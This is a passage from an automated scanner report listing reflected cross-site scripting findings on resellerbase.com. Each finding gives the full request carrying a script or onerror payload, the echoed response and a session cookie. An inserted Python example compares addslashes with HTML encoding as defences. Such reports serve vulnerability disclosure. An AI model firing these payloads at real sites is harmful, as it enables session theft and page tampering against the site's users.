HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationa6ed7<script>alert(1)</script>2c6a8f8318aa7ea05/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4812. http://www.resellerbase.com/travel-vaccation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89fb4<script>alert(1)</script>9b4ae8b707a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation89fb4<script>alert(1)</script>9b4ae8b707a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation89fb4<script>alert(1)</script>9b4ae8b707a/ was not found on this server.</p>
...[SNIP]...

2.4813. http://www.resellerbase.com/travel-vaccation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae128<script>alert(1)</script>2365fa3ba2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/?ae128<script>alert(1)</script>2365fa3ba2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/?ae128<script>alert(1)</script>2365fa3ba2=1 was not found on this server.</p>
...[SNIP]...

2.4814. http://www.resellerbase.com/travel-vaccation/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 47102<a>f4db0089433 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f47102<a>f4db0089433 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f47102<a>f4db0089433 was not found on this server.</p>
...[SNIP]...

2.4815. http://www.resellerbase.com/travel-vaccation/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84d1f<script>alert(1)</script>774982d9897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation84d1f<script>alert(1)</script>774982d9897/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation84d1f<script>alert(1)</script>774982d9897/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4816. http://www.resellerbase.com/travel-vaccation/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b53a<script>alert(1)</script>08389db50c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/googlepr.php6b53a<script>alert(1)</script>08389db50c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php6b53a<script>alert(1)</script>08389db50c6 was not found on this server.</p>
...[SNIP]...

2.4817. http://www.resellerbase.com/travel-vaccation/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 1cb1e<a>6a1726b5782 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/googlepr.php?link_id=201cb1e<a>6a1726b5782 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php?link_id=201cb1e<a>6a1726b5782 was not found on this server.</p>
...[SNIP]...

2.4818. http://www.resellerbase.com/travel-vaccation/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c90d<script>alert(1)</script>c282ec1078b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/googlepr.php?2c90d<script>alert(1)</script>c282ec1078b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php?2c90d<script>alert(1)</script>c282ec1078b=1 was not found on this server.</p>
...[SNIP]...

2.4819. http://www.resellerbase.com/travel-vaccation/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40698<script>alert(1)</script>26478a05782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation40698<script>alert(1)</script>26478a05782/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation40698<script>alert(1)</script>26478a05782/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4820. http://www.resellerbase.com/travel-vaccation/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65d31<script>alert(1)</script>87fc93b9d81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/search.php65d31<script>alert(1)</script>87fc93b9d81?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php65d31<script>alert(1)</script>87fc93b9d81?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4821. http://www.resellerbase.com/travel-vaccation/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc55<a>bcc3d74472d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search9dc55<a>bcc3d74472d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search9dc55<a>bcc3d74472d&opt=2 was not found on this server.</p>
...[SNIP]...

2.4822. http://www.resellerbase.com/travel-vaccation/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24bf1"><img%20src%3da%20onerror%3dalert(1)>a17931350f2 was submitted in the cat parameter. This input was echoed as 24bf1\"><img src=a onerror=alert(1)>a17931350f2 in the application's response. The backslash in front of the double quote shows that the application escapes quotes in the backslash style (consistent with PHP's addslashes() or the magic_quotes_gpc setting) instead of HTML-encoding them; a backslash has no meaning to an HTML parser, so the quote still terminates the href attribute and the img tag that follows it is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /travel-vaccation/search.php?cat=1224bf1"><img%20src%3da%20onerror%3dalert(1)>a17931350f2&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=1224bf1\"><img src=a onerror=alert(1)>a17931350f2">
...[SNIP]...

2.4823. http://www.resellerbase.com/travel-vaccation/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70f6"><img%20src%3da%20onerror%3dalert(1)>cb82b30c8dccbea2a was submitted in the cat parameter. This input was echoed as e70f6\"><img src=a onerror=alert(1)>cb82b30c8dccbea2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /travel-vaccation/search.php?cat=12e70f6"><img%20src%3da%20onerror%3dalert(1)>cb82b30c8dccbea2a&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/search.php?cat=12&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=12e70f6\"><img src=a onerror=alert(1)>cb82b30c8dccbea2a">
...[SNIP]...
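
Findings 2.4822 and 2.4823 are the two genuine 200-response reflections in this part of the report, and the `\"` in the echoed value is the detail worth a second look: the application backslash-escapes the quote, which is what PHP's addslashes() or magic_quotes_gpc produce, and then writes the result into an href attribute where a backslash means nothing. The script below is an added example, not code from the report or from the scanned site. It models the three candidate treatments of the cat value in Python (addslashes() as PHP defines it, htmlspecialchars() with ENT_QUOTES via html.escape(), and percent-encoding followed by HTML encoding, which is the correct layering for a query-string value inside an attribute), renders each into a link template reconstructed from the response snippet above, and then parses the result the way a browser would to see whether an event-handler attribute survives. The template text, the payload from finding 2.4823 and all function names are this example's own assumptions.

```python
"""Backslash-escaping a quote does not stop attribute breakout; HTML encoding does.

Added example, not code from the report or from the scanned site.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Reconstructed from the response snippet in the report; the link text is assumed.
LINK_TEMPLATE = '<a href="http://www.resellerbase.com/add.php?cat={cat}">Add your site</a>'
# The cat value from finding 2.4823 (a valid id, then the scanner's markup).
PAYLOAD = '12e70f6"><img src=a onerror=alert(1)>cb82b30c8dccbea2a'


def addslashes(value):
    """Model of PHP addslashes(): a backslash before ' " \\ and NUL. Meaningless to an HTML parser."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def htmlspecialchars(value):
    """Model of PHP htmlspecialchars($v, ENT_QUOTES): & < > " ' become entities."""
    return html.escape(value, quote=True)


def url_then_html(value):
    """Percent-encode for the URL layer, then entity-encode for the attribute layer."""
    return html.escape(quote(value, safe=""), quote=True)


class _AttrCollector(HTMLParser):
    """Collect every (tag, attribute, value) triple the parser actually produces."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend((tag, name, value) for name, value in attrs)

    handle_startendtag = handle_starttag


def attributes(markup):
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def render(cat, escaper):
    """Build the link the way the page does, with the chosen escaping applied to cat."""
    return LINK_TEMPLATE.format(cat=escaper(cat))


def event_handlers(markup):
    """Event-handler (on*) attributes present after parsing: any hit means injected script."""
    return [(t, n, v) for t, n, v in attributes(markup) if n.startswith("on")]


def cat_from_link(markup):
    """The cat value a browser would send when the rendered link is followed."""
    href = next(v for t, n, v in attributes(markup) if t == "a" and n == "href")
    return parse_qs(urlsplit(href).query).get("cat", [None])[0]


if __name__ == "__main__":
    for escaper in (addslashes, htmlspecialchars, url_then_html):
        link = render(PAYLOAD, escaper)
        print(escaper.__name__, event_handlers(link), repr(cat_from_link(link)))
```

With addslashes() the rendered link is byte-for-byte the `<a href=...>` line in the response above, the parser yields an img element with an onerror handler, and the cat value the link would carry is truncated to `12e70f6\`. With either HTML-encoding variant no handler survives; only the percent-encoded form also round-trips the original value intact, which is why encoding for the URL and then for the attribute is the fix rather than htmlspecialchars() alone.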

2.4824. http://www.resellerbase.com/travel-vaccation/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 50a91<a>cced0ac3d8e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...50a91<a>cced0ac3d8e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...50a91<a>cced0ac3d8e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4825. http://www.resellerbase.com/travel-vaccation/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c9f8<script>alert(1)</script>fe1f52ba582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2&3c9f8<script>alert(1)</script>fe1f52ba582=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2&3c9f8<script>alert(1)</script>fe1f52ba582=1 was not found on this server.</p>
...[SNIP]...

2.4826. http://www.resellerbase.com/travel-vaccation/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d149a<a>34e970cfc52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2d149a<a>34e970cfc52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search&opt=2d149a<a>34e970cfc52 was not found on this server.</p>
...[SNIP]...

2.4827. http://www.resellerbase.com/travel-vaccation/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 551b5<script>alert(1)</script>9404917dc73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation551b5<script>alert(1)</script>9404917dc73/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
